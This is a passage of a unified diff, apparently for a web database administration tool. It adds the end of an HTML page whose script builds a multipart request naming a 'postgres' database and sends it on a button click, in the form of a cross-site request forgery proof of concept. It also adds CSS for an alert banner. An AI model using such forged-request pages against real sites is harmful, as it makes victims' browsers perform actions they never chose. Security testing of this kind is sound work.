+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"database\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "postgres\r\n" +
|
|
+ "-----------------------------297112967428312--\r\n";
|
|
+ var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++)
|
|
+ aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody]));
|
|
+ }
|
|
+</script>
|
|
+<form action="#">
|
|
+ <input type="button" value="Submit request" onclick="submitRequest();" />
|
|
+</form>
|
|
+</body>
|
|
+</html>
|
|
Index: themes/global.css
|
|
===================================================================
|
|
--- themes/global.css.orig
|
|
+++ themes/global.css
|
|
@@ -92,6 +92,26 @@ body.browser {
|
|
color: #9F6000;
|
|
}
|
|
|
|
+/** alert banner **/
|
|
+.alert-banner {
|
|
+ background-color: #FEEFB3;
|
|
+ border: 1px dotted #9F6000;
|
|
+ color: #9F6000;
|
|
+ padding: 4px;
|
|
+ margin: 4px 0;
|
|
+}
|
|
+.alert-banner p {
|
|
+ margin: 0;
|
|
+ padding: 0;
|
|
+}
|
|
+.alert-banner p:before {
|
|
+ content: url(../../images/themes/default/ObjectNotFound.png);
|
|
+ vertical-align: -20%;
|
|
+}
|
|
+.alert-banner p a {
|
|
+ color: #9F6000;
|
|
+}
|
|
+
|
|
/** bottom link back to top **/
|
|
.bottom_link {
|
|
position: fixed;
|